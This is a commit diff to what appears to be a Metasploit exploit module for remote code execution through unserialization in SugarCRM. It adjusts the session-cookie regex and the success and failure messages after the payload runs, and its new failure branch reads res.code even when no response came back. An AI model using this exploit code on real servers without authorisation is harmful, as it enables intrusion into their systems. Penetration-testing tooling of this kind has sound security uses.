Cookie fix and success display

nanomebia · nanomebia · commit fefc3d088c29 · 2015-01-28T17:11:05.000+08:00
Added handling for if the server doesn't correctly assign a cookie using
Set-Cookie by changing the regex and doing an additional check.  Also
fixed the success display -  changed the if statement to match others in
this module and fixed the text output based on server response.
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -103,9 +103,13 @@ def exploit
     if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/
       session_id = $1
     else
-      print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
-      return
+      if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*);/
+        session_id = $1
+      else
+        print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+        return
     end
+   end
 
     print_status("#{peer} - Login successful with #{username}:#{password}")
 
@@ -144,10 +148,12 @@ def exploit
       }
     })
 
-    if res
+    if not res or res.code != 200
       print_error("#{peer} - Payload execution failed: #{res.code}")
-      return
+    else
+      print_good("#{peer} - Payload Executed Successfuly: #{res.code}")
     end
 
   end
 end
+
